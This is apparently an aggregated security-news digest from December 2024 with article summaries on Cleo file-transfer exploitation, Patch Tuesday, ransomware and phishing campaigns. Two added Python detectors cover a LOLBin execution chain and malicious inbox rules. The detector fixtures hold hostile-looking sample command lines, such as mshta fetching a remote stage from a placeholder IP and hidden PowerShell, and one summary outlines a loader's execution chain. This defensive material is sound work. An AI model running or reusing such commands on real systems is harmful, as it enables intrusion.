    The post SecureAuth protects sensitive information with biometric continuous identity assurance appeared first on Help Net Security.

    "

    Autosummary: According to SecureAuth CRO Tom Smith, these expanded capabilities strengthen SecureAuth’s competitiveness in sectors with high security needs, especially legal services, call centers and regulated industries like financial services, healthcare, defense contracting, and more. "


    Attackers actively exploiting flaw(s) in Cleo file transfer software (CVE-2024-50623)

    exploits
    2024-12-10 https://www.helpnetsecurity.com/2024/12/10/cve-2024-50623-cleo-file-transfer-software-vulnerabilities-exploited/

    Attackers are exploiting a vulnerability (CVE-2024-50623) in file transfer software by Cleo – LexiCom, VLTrader, and Harmony – to gain access to organizations’ systems, Huntress researchers warned on Monday. “We’ve discovered at least 10 businesses whose Cleo servers were compromised with a notable uptick in exploitation observed on December 8 around 07:00 UTC. After some initial analysis, however, we have found evidence of exploitation as early as December 3,” they shared, and noted that there … More

    The post Attackers actively exploiting flaw(s) in Cleo file transfer software (CVE-2024-50623) appeared first on Help Net Security.

    "

    Autosummary: For those that use Autorun in day-to-day operations, the company advises:
    - Changing the default Autorun directory to a custom name
    - Searching for malicious files on the hosts and removing them (either manually or via provided scripts that locate and quarantine any malicious hosts)
    - Blocking attack IP addresses at the network/firewall level
    The company also laid out configuration changes that can be made by customers to restrict access to the servers, and advised using EDR solutions to monitor for unauthorized changes in configuration or other critical files. "


    Phone Phishing Gang Busted: Eight Arrested in Belgium and Netherlands

    financial
    2024-12-10 https://thehackernews.com/2024/12/phone-phishing-gang-busted-eight.html
    Belgian and Dutch authorities have arrested eight suspects in connection with a "phone phishing" gang that primarily operated out of the Netherlands with an aim to steal victims' financial data and funds. As part of the international operation, law enforcement agencies carried out 17 searches in different locations in Belgium and the Netherlands, Europol said. In addition, large amounts of cash, "

    Autosummary: "


    Ongoing Phishing and Malware Campaigns in December 2024

    financial exploits
    2024-12-10 https://thehackernews.com/2024/12/ongoing-phishing-and-malware-campaigns.html
    Cyber attackers never stop inventing new ways to compromise their targets. That's why organizations must stay updated on the latest threats. Here's a quick rundown of the current malware and phishing attacks you need to know about to safeguard your infrastructure before they reach you. Zero-day Attack: Corrupted Malicious Files Evade Detection by Most Security Systems The analyst "

    Autosummary: In one of the latest attacks, criminals utilize scripts to facilitate an execution chain that involves the following steps:
    - LNK file initiates Forfiles
    - Forfiles locates HelpPane
    - PowerShell launches Mshta with the AES-encrypted first-stage payload
    - Mshta decrypts and executes the downloaded payload
    - PowerShell runs an AES-encrypted command to decrypt Emmenhtal
    (The entire execution chain is demonstrated in ANY.RUN's Interactive sandbox.) The Emmenhtal loader, which is the final PowerShell script, executes a payload — often Updater.exe — by using a binary file with a generated name as an argument. "
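    The execution chain above (LNK to Forfiles to PowerShell to Mshta to a second PowerShell stage) is a sequence of Windows living-off-the-land binaries; each is common on its own, and it is the parent-child order that is rare. The following Python is an added example of detecting that lineage in process-creation telemetry; it is not code from the article or from ANY.RUN. It assumes a minimal record shape (pid, ppid, image, cmdline) in the spirit of Sysmon Event ID 1 or Windows 4688 events, and the sample events below are constructed, not captured from a real incident.

```python
import ntpath
from collections import defaultdict

# Constructed sample events (not from a real incident). Record shape is an
# assumption: a minimal process-creation event with pid, ppid, image, cmdline.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c "C:\\Users\\u\\Downloads\\invoice.pdf.lnk"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\forfiles.exe",
     "cmdline": r'forfiles.exe /p C:\Windows /m HelpPane.exe /c "powershell -w hidden -c ..."'},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c ..."},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://203.0.113.10/stage1"},  # TEST-NET address, constructed
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -enc ..."},
    # Benign lineage: an admin purges old logs with forfiles; cmd.exe is the child.
    {"pid": 700, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 800, "ppid": 700, "image": r"C:\Windows\System32\forfiles.exe",
     "cmdline": r'forfiles /p C:\logs /d -30 /c "cmd /c del @path"'},
    {"pid": 900, "ppid": 800, "image": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd /c del C:\logs\old.log"},
]

# Parent -> child pairs taken from the chain described above. Any one of these
# binaries is common; the ordered lineage is what is worth alerting on.
SUSPICIOUS_EDGES = {
    ("forfiles.exe", "powershell.exe"),
    ("forfiles.exe", "helppane.exe"),
    ("helppane.exe", "powershell.exe"),
    ("powershell.exe", "mshta.exe"),
    ("mshta.exe", "powershell.exe"),
}


def _name(event):
    """Lower-cased image basename; ntpath handles Windows paths on any host."""
    return ntpath.basename(event["image"]).lower()


def find_lolbin_chains(events, min_len=3):
    """Return lineages (lists of image basenames) in which every parent->child
    hop is a SUSPICIOUS_EDGES pair and the lineage has at least min_len nodes.
    Each chain is reported once, starting from its first suspicious hop."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)

    chains = []

    def walk(event, path):
        extended = False
        for kid in children[event["pid"]]:
            if (_name(event), _name(kid)) in SUSPICIOUS_EDGES:
                extended = True
                walk(kid, path + [_name(kid)])
        # Report only maximal chains (leaf of the suspicious walk).
        if not extended and len(path) >= min_len:
            chains.append(path)

    for e in events:
        parent = by_pid.get(e["ppid"])
        # Only start at the head of a chain so sub-chains are not reported twice.
        if parent is not None and (_name(parent), _name(e)) in SUSPICIOUS_EDGES:
            continue
        walk(e, [_name(e)])
    return chains


if __name__ == "__main__":
    for chain in find_lolbin_chains(SAMPLE_EVENTS):
        print("suspicious LOLBin lineage: " + " -> ".join(chain))
```

    The benign forfiles job in the sample (the log-purge tree) is not reported because cmd.exe is not one of the chain's edges. If an environment legitimately chains forfiles into PowerShell, tune SUSPICIOUS_EDGES or raise min_len rather than suppressing the rule outright.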


    CERT-UA Warns of Phishing Attacks Targeting Ukraine’s Defense and Security Force

    financial
    2024-12-10 https://thehackernews.com/2024/12/cert-ua-warns-of-phishing-attacks.html
    The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new set of cyber attacks that it said were aimed at defense companies in the country as well as its security and defense forces. The phishing attacks have been attributed to a Russia-linked threat actor called UAC-0185 (aka UNC4221), which has been active since at least 2022. "The phishing emails mimicked official messages "

    Autosummary: "


    US sanctions Chinese firm for hacking firewalls in ransomware attacks

    exploits ransomware
    2024-12-10 https://www.bleepingcomputer.com/news/security/us-sanctions-chinese-firm-for-hacking-firewalls-in-ragnarok-ransomware-attacks/
    The U.S. Treasury Department has sanctioned Chinese cybersecurity company Sichuan Silence and one of its employees for their involvement in a series of Ragnarok ransomware attacks targeting U.S. critical infrastructure companies and many other victims worldwide in April 2020. [...] "

    Autosummary: "Between April 22 and 25, 2020, Guan Tianfeng used this zero-day exploit to deploy malware to approximately 81,000 firewalls owned by thousands of businesses worldwide," a press release published today revealed. "


    New Cleo zero-day RCE flaw exploited in data theft attacks

    exploits
    2024-12-10 https://www.bleepingcomputer.com/news/security/new-cleo-zero-day-rce-flaw-exploited-in-data-theft-attacks/
    Hackers are actively exploiting a zero-day vulnerability in Cleo managed file transfer software to breach corporate networks and conduct data theft attacks. [...] "

    Autosummary: Cleo says its software is used by 4,000 companies worldwide, including Target, Walmart, Lowes, CVS, The Home Depot, FedEx, Kroger, Wayfair, Dollar General, Victrola, and Duraflame. "


    Inside the incident: Uncovering an advanced phishing attack

    financial
    2024-12-10 https://www.bleepingcomputer.com/news/security/inside-the-incident-uncovering-an-advanced-phishing-attack/
    Recently, Varonis investigated a phishing campaign in which a malicious email enabled a threat actor to access the organization. This blog post will reveal the tactics used to avoid detection and share what was discovered during the investigation. [...] "

    Autosummary: Initially, our only indicators of compromise were the recipient’s email address and the source IP of the deletion rule creation event, which turned out to be a general Microsoft IP and, therefore, not very useful in that case. Fortunately, our customer’s security team acted swiftly, disabling the account, ending the session, and resetting the user’s credentials within 30 minutes. To develop part of the attack, the threat actor used the public platform Render, a unified cloud platform that allows developers to build, deploy, and scale applications and websites easily. IoCs 138.199.52[.]3 siffinance[.]com login.siffinance[.]com www.siffinance[.]com ywnjb.siffinance[.]com atoantibot.onrender[.]com file365-cloud.s3.eu-west-2.amazonaws[.]com How Varonis can help Varonis monitors real-time email and browsing activities and user and data activities, providing a comprehensive tool for cyber forensics investigations. Circling back to the “hacker humor” mentioned above, the attacker has disabled (or deactivated) the malicious domain, but if you try to access it today, it redirects to a popular internet prank known as Rickrolling. "
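    The investigation above began from a single mailbox-rule creation event whose client IP resolved to Microsoft-owned address space and was therefore useless as an indicator. The Python below is an added example, not Varonis's code, that scores mailbox-rule audit records on what the rule does (delete, hide, mark as read, key on finance words) rather than on where it came from. The field names (Operation, UserId, ClientIP, Parameters as Name/Value pairs) only approximate the Exchange Online audit record shape and are an assumption; the records are constructed.

```python
import json

# Constructed sample records (assumption: field names approximate the shape of
# Exchange Online mailbox-audit entries; adapt _params() to the real schema).
SAMPLE_AUDIT_JSON = json.dumps([
    {"Operation": "New-InboxRule", "UserId": "alice@example.com", "ClientIP": "40.126.0.1",
     "Parameters": [{"Name": "Name", "Value": "."},
                    {"Name": "SubjectContainsWords", "Value": "invoice;payment;wire"},
                    {"Name": "DeleteMessage", "Value": "True"},
                    {"Name": "MarkAsRead", "Value": "True"}]},
    {"Operation": "New-InboxRule", "UserId": "bob@example.com", "ClientIP": "203.0.113.7",
     "Parameters": [{"Name": "Name", "Value": "Newsletters"},
                    {"Name": "FromAddressContainsWords", "Value": "news@vendor.example"},
                    {"Name": "MoveToFolder", "Value": "Newsletters"}]},
    {"Operation": "Set-InboxRule", "UserId": "carol@example.com", "ClientIP": "198.51.100.9",
     "Parameters": [{"Name": "Identity", "Value": "Old"},
                    {"Name": "MoveToFolder", "Value": "RSS Feeds"},
                    {"Name": "StopProcessingRules", "Value": "True"}]},
    {"Operation": "MailItemsAccessed", "UserId": "alice@example.com", "ClientIP": "40.126.0.1",
     "Parameters": []},
])

RULE_OPS = {"New-InboxRule", "Set-InboxRule", "UpdateInboxRules"}
# Folders attackers use to park mail the victim is unlikely to open.
HIDING_FOLDERS = {"rss feeds", "rss subscriptions", "deleted items", "junk email",
                  "archive", "conversation history"}
FINANCE_WORDS = {"invoice", "payment", "wire", "bank", "password"}


def _params(record):
    """Flatten the Name/Value parameter list into a dict of strings."""
    return {p["Name"]: str(p.get("Value", "")) for p in record.get("Parameters", [])}


def score_rule(record):
    """Return (score, reasons) for one audit record; 0 means nothing suspicious."""
    if record.get("Operation") not in RULE_OPS:
        return 0, []
    p = _params(record)
    score, reasons = 0, []
    if p.get("DeleteMessage", "").lower() == "true":
        score += 3
        reasons.append("rule deletes matching mail")
    if p.get("MoveToFolder", "").lower() in HIDING_FOLDERS:
        score += 2
        reasons.append("rule moves mail to a rarely watched folder")
    if p.get("MarkAsRead", "").lower() == "true":
        score += 1
        reasons.append("rule marks mail as read")
    name = p.get("Name", "")
    if name and not name.strip(". ,-_"):  # names like "." or "," are a known tell
        score += 2
        reasons.append("rule name is punctuation only")
    words = {w.strip().lower() for w in p.get("SubjectContainsWords", "").split(";") if w.strip()}
    if words & FINANCE_WORDS:
        score += 2
        reasons.append("rule keys on finance/credential keywords")
    if p.get("StopProcessingRules", "").lower() == "true":
        score += 1
        reasons.append("rule stops further processing")
    return score, reasons


def find_suspicious_rules(audit_json, threshold=3):
    """Return findings for records scoring at or above threshold. ClientIP is
    carried for triage only; it is deliberately not scored, because (as in the
    case above) it may resolve to Microsoft-owned space and prove nothing."""
    findings = []
    for rec in json.loads(audit_json):
        score, reasons = score_rule(rec)
        if score >= threshold:
            findings.append({"user": rec["UserId"], "client_ip": rec.get("ClientIP"),
                             "score": score, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_rules(SAMPLE_AUDIT_JSON):
        print(f"{f['user']} score={f['score']} ip={f['client_ip']}: " + "; ".join(f["reasons"]))
```

    Alice's rule (punctuation name, deletes finance-keyword mail, marks it read) scores highest; Carol's Set-InboxRule that silently reroutes mail to RSS Feeds still clears the threshold; Bob's newsletter filter does not. Weighting on rule behaviour is what lets the detection fire even when the creation event's source IP is uninformative.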


    Wyden proposes bill to secure US telecoms after Salt Typhoon hacks

    Telcos
    2024-12-10 https://www.bleepingcomputer.com/news/security/wyden-proposes-bill-to-secure-us-telecoms-after-salt-typhoon-hacks/
    U.S. Senator Ron Wyden of Oregon announced a new bill to secure the networks of American telecommunications companies breached by Salt Typhoon Chinese state hackers earlier this year. [...] "

    Autosummary: Also tracked as Earth Estries, Ghost Emperor, FamousSparrow, and UNC2286, the Salt Typhoon Chinese state-sponsored hacking group has been active since at least 2019, breaching government entities and telecom companies across Southeast Asia. "


    WPForms bug allows Stripe refunds on millions of WordPress sites

    exploits
    2024-12-10 https://www.bleepingcomputer.com/news/security/wpforms-bug-allows-stripe-refunds-on-millions-of-wordpress-sites/
    A vulnerability in WPForms, a WordPress plugin used in over 6 million websites, could allow subscriber-level users to issue arbitrary Stripe refunds or cancel subscriptions. [...] "

    Autosummary: WPForms is an easy-to-use drag-and-drop WordPress form builder for creating contact, feedback, subscription, and payment forms, offering support for Stripe, PayPal, Square, and others. "


    Ivanti warns of maximum severity CSA auth bypass vulnerability

    exploits
    2024-12-10 https://www.bleepingcomputer.com/news/security/ivanti-warns-of-maximum-severity-csa-auth-bypass-vulnerability/
    Ivanti warned customers on Tuesday about a new maximum-severity authentication bypass vulnerability in its Cloud Services Appliance (CSA) solution. [...] "

    Autosummary: "


    Windows 10 KB5048652 update fixes new motherboard activation bug

    exploits
    2024-12-10 https://www.bleepingcomputer.com/news/microsoft/windows-10-kb5048652-update-fixes-new-motherboard-activation-bug/
    Microsoft has released the KB5048652 cumulative update for Windows 10 22H2, which contains six fixes, including a fix that prevented Windows 10 from activating when you change a device's motherboard. [...] "

    Autosummary: Windows users can install this update by going into Settings, clicking on Windows Update, and manually performing a "Check for Updates." However, as this update is mandatory, it will automatically start installing in Windows once you check for updates. "


    Microsoft December 2024 Patch Tuesday fixes 1 exploited zero-day, 71 flaws

    exploits
    2024-12-10 https://www.bleepingcomputer.com/news/microsoft/microsoft-december-2024-patch-tuesday-fixes-1-exploited-zero-day-71-flaws/
    Today is Microsoft's December 2024 Patch Tuesday, which includes security updates for 71 flaws, including one actively exploited zero-day vulnerability. [...] "

    Autosummary: "


    3AM ransomware: what you need to know

    exploits ransomware
    2024-12-10 https://www.tripwire.com/state-of-security/3am-ransomware-what-you-need-know
    The 3AM ransomware first emerged in late 2023. Like other ransomware, 3AM exfiltrates victims' data (demanding a ransom is paid) and encrypts the copies left behind. Here's what you need to know. Read more in my article on the Tripwire State of Security blog. "

    Autosummary: Not "backup" as in a "backup of your data" unfortunately but rather as a "backup plan". 3AM drops a ransom note on attacked systems, warning victims that their sensitive data has been stolen and proposing "a deal" to prevent it from being sold on the dark web. The latter of those not only saw social security numbers, driver’s licenses, payroll, health and other personal data of Hoboken workers and residents leaked, but also erotic short stories found on an employee's computer. "


    Microsoft fixes exploited zero-day (CVE-2024-49138)

    exploits
    2024-12-10 https://www.helpnetsecurity.com/2024/12/10/december-2024-patch-tuesday-microsoft-zero-day-cve-2024-49138/

    On December 2024 Patch Tuesday, Microsoft resolved 71 vulnerabilities in a variety of its products, including a zero-day (CVE-2024-49138) that’s been exploited by attackers in the wild to execute code with higher privileges. CVE-2024-49138 exploited by attackers CVE-2024-49138 stems from a heap-based buffer overflow vulnerability in the Windows Common Log File System (CLFS) Driver and can be exploited by attackers to elevate their privileges on the target host to SYSTEM, according to Microsoft. The attack … More

    The post Microsoft fixes exploited zero-day (CVE-2024-49138) appeared first on Help Net Security.

    "

    Autosummary: “Though in-the-wild exploitation details aren’t known yet, looking back at the history of CLFS driver vulnerabilities, it is interesting to note that ransomware operators have developed a penchant for exploiting CLFS elevation of privilege flaws over the last few years,” Satnam Narang, senior staff research engineer at Tenable, told Help Net Security. "


    US sanctions Chinese cybersecurity company for firewall compromise, ransomware attacks

    exploits ransomware ciber
    2024-12-10 https://www.helpnetsecurity.com/2024/12/10/us-sanctions-sichuan-silence-guan-tianfeng/

    The Department of the Treasury is sanctioning Chinese cybersecurity company Sichuan Silence, and one of its employees, Guan Tianfeng, for their roles in the April 2020 compromise of tens of thousands of firewalls worldwide. Many of the victims were U.S. critical infrastructure companies. The Department of Justice unsealed an indictment on Guan for the same activity. The U.S. Department of State also announced a Rewards for Justice reward offer of up to $10 million for … More

    The post US sanctions Chinese cybersecurity company for firewall compromise, ransomware attacks appeared first on Help Net Security.

    "

    Autosummary: OFAC is designating Sichuan Silence and Guan pursuant to Executive Order (E.O.) 13694, as amended by E.O. 13757, for being responsible for or complicit in, or having engaged in, directly or indirectly cyber-enabled activities originating from, or directed by persons located, in whole or in substantial part, outside the United States that are reasonably likely to result in, or have materially contributed to, a significant threat to the national security, foreign policy, or economic health or financial stability of the United States and that have the purpose or effect of harming, or otherwise significantly compromising the provision of services by, a computer or network of computers that support one or more entities in a critical infrastructure sector. "


    Cleo File Transfer Vulnerability Under Exploitation – Patch Pending, Mitigation Urged

    exploits
    2024-12-10 https://thehackernews.com/2024/12/cleo-file-transfer-vulnerability-under.html
    Users of Cleo-managed file transfer software are being urged to ensure that their instances are not exposed to the internet following reports of mass exploitation of a vulnerability affecting fully patched systems. Cybersecurity company Huntress said it discovered evidence of threat actors exploiting the issue en masse on December 3, 2024. The vulnerability, which impacts Cleo's LexiCom, "

    Autosummary: "Since we saw that Blue Yonder had an instance of Cleo's software open to the internet via Shodan, and Termite has claimed Blue Yonder amongst its victims, which was also confirmed by their listing and open directory of files, I'd say that Gossi is correct in his statement," Jamie Levy, Huntress' Director of Adversary Tactics, told the publication. The Illinois-based company, which has over 4,200 customers across the world, has since issued another advisory (CVE pending), warning of a separate "unauthenticated malicious hosts vulnerability that could lead to remote code execution." "


    Fake Recruiters Distribute Banking Trojan via Malicious Apps in Phishing Scam

    financial exploits
    2024-12-10 https://thehackernews.com/2024/12/fake-recruiters-distribute-banking.html
    Cybersecurity researchers have shed light on a sophisticated mobile phishing (aka mishing) campaign that's designed to distribute an updated version of the Antidot banking trojan. "The attackers presented themselves as recruiters, luring unsuspecting victims with job offers," Zimperium zLabs researcher Vishnu Pratapagiri said in a new report. "As part of their fraudulent hiring process, the "

    Autosummary: The newest version of Antidot is packed with support for new commands that allow the operators to launch "Keyboard & Input" settings, interact with the lock screen based on the set value (i.e., PIN, pattern, or password), wake up the device, reduce screen brightness to the lowest level, launch overlays to steal Google account credentials, and even prevent it from being uninstalled. "


    Microsoft December 2024 Patch Tuesday addressed actively exploited zero-day

    exploits
    2024-12-10 https://securityaffairs.com/171845/security/microsoft-december-2024-patch-tuesday.html
    Microsoft December 2024 Patch Tuesday security updates addressed 71 vulnerabilities including an actively exploited zero-day. Microsoft December 2024 Patch Tuesday security updates addressed 71 vulnerabilities in Windows and Windows Components, Office and Office Components, SharePoint Server, Hyper-V, Defender for Endpoint, and System Center Operations Manager. 16 vulnerabilities are rated Critical, 54 are rated Important, and […] "

    Autosummary: "


    Romanian energy supplier Electrica Group is facing a ransomware attack

    exploits ransomware industry
    2024-12-10 https://securityaffairs.com/171832/hacking/electrica-group-ransomware-attack.html
    Romanian energy supplier Electrica Group is investigating an ongoing ransomware attack impacting its operations. Romanian energy supplier Electrica Group suffered a cyber attack that is impacting its operations. The company assured investors that the attack hadn’t affected its critical systems, but temporary disruptions in customer services might occur due to enhanced security protocols. These measures […] "

    Autosummary: “The teams of specialists are working closely with the national cybersecurity authorities to manage and resolve the incident, aiming to address the situation as quickly as possible, identify the source of the attack, and limit its impact,” reads the note. "


    Brazil's president 'well' after brain bleed surgery

    latam
    2024-12-10 https://www.bbc.com/news/articles/cx2w9ppej0xo
    The 79-year-old leader's bleed stems from an injury he sustained during a fall in October. "

    Autosummary: While Lula is in hospital, Vice-President Geraldo Alckmin will take on some of the president's commitments, including welcoming Slovak Prime Minister Robert Fico, who is due to arrive in Brazil later today. "


    Hit by blackouts Cuba’s tourism industry now braces for Trump

    industry
    2024-12-09 https://www.bbc.com/news/articles/cly7ndxjzv2o
    Cuba's hotels, already hit by power cuts, worry that Trump may increase the US's economic blockade. "

    Autosummary: (Image: Canadian tourists, such as these taking part in an exercise class, are vital to the Cuban tourism sector.) With winter nights drawing in across North America, Canadian “snowbirds” – citizens who flee their freezing temperatures for sunnier climes every year – are planning their annual trips to Florida or the Caribbean. “The Ministry of Tourism has been preparing for the winter season to deliver better services, uninterrupted supplies, a better airport experience, and more and new car rentals.” "


    Top cybersecurity books for your holiday gift list

    ciber
    2024-12-09 https://www.helpnetsecurity.com/2024/12/09/cybersecurity-books-gift-ideas/

    The holiday season is approaching, and with it, the tradition of gift-giving. For professionals and enthusiasts alike, a well-chosen book can provide both knowledge and inspiration. To help with ideas on what to give, we’ve compiled a list of cybersecurity books to consider. Security Yearbook 2024: A History and Directory of the IT Security Industry Author: Richard Stiennon In the book, you’ll find a comprehensive directory of cybersecurity vendors, updated for 2024, complete with headquarters … More

    The post Top cybersecurity books for your holiday gift list appeared first on Help Net Security.

    "

    Autosummary: Author: Richard Stiennon In the book, you’ll find a comprehensive directory of cybersecurity vendors, updated for 2024, complete with headquarters location, category, sub-category, number of employees, and growth trends. "


    What makes for a fulfilled cybersecurity career

    ciber
    2024-12-09 https://www.helpnetsecurity.com/2024/12/09/fulfilled-cybersecurity-career-insight-video/

    In this Help Net Security video, Richard Hummel, NETSCOUT’s Director of Threat Intelligence, talks about his journey into cybersecurity and offers insight for those that are interested in pursuing it as a career.

    The post What makes for a fulfilled cybersecurity career appeared first on Help Net Security.

    "

    Autosummary: "


    2023 Anna Jaques Hospital data breach impacted over 310,000 people

    financial
    2024-12-09 https://securityaffairs.com/171801/data-breach/anna-jaques-hospital-data-breach.html
    Anna Jaques Hospital revealed that the ransomware attack it suffered last year has exposed sensitive health data for over 316,000 patients. On December 25, 2023, a ransomware attack hit the Anna Jaques Hospital. The hospital revealed that the security breach exposed sensitive health data for over 316,000 patients. Anna Jaques Hospital is a not-for-profit community healthcare […] "

    Autosummary: Exposed information varies per individual; however, it may include demographic information, medical information, health insurance information, Social Security number, driver’s license number, financial information, and other personal or health information that patients provided to Anna Jaques. "


    Romanian energy supplier Electrica hit by ransomware attack

    exploits ransomware industry
    2024-12-09 https://www.bleepingcomputer.com/news/security/romanian-energy-supplier-electrica-hit-by-ransomware-attack/
    Electrica Group, a key player in the Romanian electricity distribution and supply market, is investigating a ransomware attack that was still "in progress" earlier today. [...] "

    Autosummary: "


    RSA expands phishing-resistant, passwordless capabilities

    financial
    2024-12-09 https://www.helpnetsecurity.com/2024/12/09/rsa-phishing-solutions/

    RSA announced expanded phishing-resistant, passwordless capabilities. Built to secure financial services organizations, government agencies, healthcare, and other highly-regulated industries from the most frequent and highest-impact attacks, these new RSA capabilities meet the most stringent cybersecurity regulations and are a key asset in developing a Zero Trust security architecture: The FIDO2 Certified RSA Authenticator App 4.5 for iOS and Android: RSA now makes it easy to deploy FIDO2-Certified device-bound passkeys on users’ mobile devices through RSA … More

    The post RSA expands phishing-resistant, passwordless capabilities appeared first on Help Net Security.

    "

    Autosummary: "


    ⚡ THN Recap: Top Cybersecurity Threats, Tools and Tips (Dec 2 - 8)

    ciber
    2024-12-09 https://thehackernews.com/2024/12/thn-recap-top-cybersecurity-threats_9.html
    This week’s cyber world is like a big spy movie. Hackers are breaking into other hackers’ setups, sneaky malware is hiding in popular software, and AI-powered scams are tricking even the smartest of us. On the other side, the good guys are busting secret online markets and kicking out shady chat rooms, while big companies rush to fix new security holes before attackers can jump in. Want to "

    Autosummary: The list includes — CVE-2024-41713 (Mitel MiCollab), CVE-2024-51378 (CyberPanel), CVE-2023-45727 (Proself), CVE-2024-11680 (ProjectSend), CVE-2024-11667 (Zyxel), CVE-2024-42448 (Veeam), CVE-2024-10905 (SailPoint IdentityIQ), CVE-2024-5921 (Palo Alto Networks GlobalProtect), CVE-2024-29014 (SonicWall), CVE-2014-2120 (Cisco Adaptive Security Appliance), CVE-2024-20397 (Cisco NX-OS), CVE-2024-52338 (Apache Arrow), CVE-2024-52316 (Apache Tomcat), CVE-2024-49803, CVE-2024-49805 (IBM Security Verify Access Appliance), CVE-2024-12053 (Google Chrome), CVE-2024-38193 (Microsoft Windows), and CVE-2024-12209 (WP Umbrella: Update Backup Restore & Monitoring plugin). Salt Typhoon Guidance Issued — Australia, Canada, New Zealand, and the U.S. issued a joint guidance for organizations to safeguard their networks against threats posed by Salt Typhoon, which has been recently linked to a spate of cyber attacks directed against telecommunication companies in the U.S., including AT&T, T-Mobile, and Verizon. A majority of the campaigns distributing the malware have targeted users in Austria, Belgium, France, Italy, Portugal, Spain, Turkey, and the United Kingdom. "Criminals use AI-generated text to appear believable to a reader in furtherance of social engineering, spear-phishing, and financial fraud schemes such as romance, investment, and other confidence schemes or to overcome common indicators of fraud schemes," the FBI said. "Once Ogletree had access to the victim companies' networks, Ogletree accessed and stole confidential data, including data that was later posted for sale on the dark web, and, at times, used the companies' services to facilitate the theft of cryptocurrency from unwitting victims. "


    Black Basta Ransomware Evolves with Email Bombing, QR Codes, and Social Engineering

    exploits ransomware
    2024-12-09 https://thehackernews.com/2024/12/black-basta-ransomware-evolves-with.html
    The threat actors linked to the Black Basta ransomware have been observed switching up their social engineering tactics, distributing a different set of payloads such as Zbot and DarkGate since early October 2024. "Users within the target environment will be email bombed by the threat actor, which is often achieved by signing up the user's email to numerous mailing lists simultaneously," Rapid7 "

    Autosummary: The threat actor, which is also referred to as UNC4393, has since put to use various bespoke malware families to carry out its objectives:
    - KNOTWRAP, a memory-only dropper written in C/C++ that can execute an additional payload in memory
    - KNOTROCK, a .NET-based utility that's used to execute the ransomware
    - DAWNCRY, a memory-only dropper that decrypts an embedded resource into memory with a hard-coded key
    - PORTYARD, a tunneler that establishes a connection to a hard-coded command-and-control (C2) server using a custom binary protocol over TCP
    - COGSCAN, a .NET reconnaissance assembly used to gather a list of hosts available on the network
    "Black Basta's evolution in malware dissemination shows a peculiar shift from a purely botnet-reliant approach to a hybrid model that integrates social engineering," RedSense's Yelisey Bohuslavskiy said. "


    Ransomware attack hits leading heart surgery device maker

    exploits
    2024-12-09 https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-leading-heart-surgery-device-maker/
    Artivion, a leading manufacturer of heart surgery medical devices, has disclosed a November 21 ransomware attack that disrupted its operations and forced it to take some systems offline. [...] "

    Autosummary: "


    Deloitte denied its systems were hacked by Brain Cipher ransomware group

    exploits ransomware
    2024-12-09 https://securityaffairs.com/171827/uncategorized/deloitte-denied-its-systems-were-hacked-by-brain-cipher-ransomware-group.html
    Deloitte has responded to claims by the Brain Cipher ransomware group, which alleges the theft of over 1 terabyte of the company’s data. Recently, the ransomware group Brain Cipher added Deloitte UK to its Tor leak site. The gang claimed to have stolen one terabyte of compressed data from the company. A Deloitte spokesperson addressed […] "

    Autosummary: "


    Week in review: Veeam Service Provider Console flaws fixed, Patch Tuesday forecast

    Telcos
    2024-12-08 https://www.helpnetsecurity.com/2024/12/08/week-in-review-veeam-service-provider-console-flaws-fixed-patch-tuesday-forecast/

    Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Veeam plugs serious holes in Service Provider Console (CVE-2024-42448, CVE-2024-42449) Veeam has fixed two vulnerabilities in Veeam Service Provider Console (VSPC), one of which (CVE-2024-42448) may allow remote attackers to achieve code execution on the VSPC server machine. December 2024 Patch Tuesday forecast: The secure future initiative impact It seems like 2024 just started, but the final Patch Tuesday of … More

    The post Week in review: Veeam Service Provider Console flaws fixed, Patch Tuesday forecast appeared first on Help Net Security.

    Autosummary:
    - Building trust in tokenized economies: In this Help Net Security video, Jeremy Bradley, COO of Zama, explores the emerging privacy-preserving technologies that can help solve this challenge, focusing on Fully Homomorphic Encryption (FHE), which enables data to remain encrypted even during processing, positioning it as a potential cornerstone for secure, decentralized environments.
    - Securing AI’s new frontier: Visibility, governance, and mitigating compliance risks: In this Help Net Security interview, Niv Braun, CEO at Noma Security, discusses the difficulties security teams face due to the fragmented nature of AI processes, tools, and teams across the data and AI lifecycle.
    - New infosec products of the week: December 6, 2024: Here’s a look at the most interesting products from the past week, featuring releases from Datadog, Fortinet, Radiant Logic, Sweet Security, Tenable, and Veza.


    SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 23

    exploits
    2024-12-08 https://securityaffairs.com/171794/malware/security-affairs-malware-newsletter-round-23.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. SmokeLoader Attack Targets Companies in Taiwan; LogoFAIL Exploited to Deploy Bootkitty, the first UEFI bootkit for Linux; Horns&Hooves campaign delivers NetSupport RAT and BurnsRAT; DroidBot: Insights from a new Turkish MaaS fraud operation; RedLine, A […]


    RedLine info-stealer campaign targets Russian businesses through pirated corporate software

    rusia-ucrania
    2024-12-08 https://securityaffairs.com/171771/cyber-crime/redline-info-stealer-campaign-targets-russian-businesses.html
    An ongoing RedLine information-stealing campaign is targeting Russian businesses using pirated corporate software. Since January 2024, Russian businesses using unlicensed software have been targeted by an ongoing RedLine info-stealer campaign. Pirated software is distributed via Russian online forums; attackers disguise the malware as a tool to bypass licensing for business automation software. Threat actors target […]

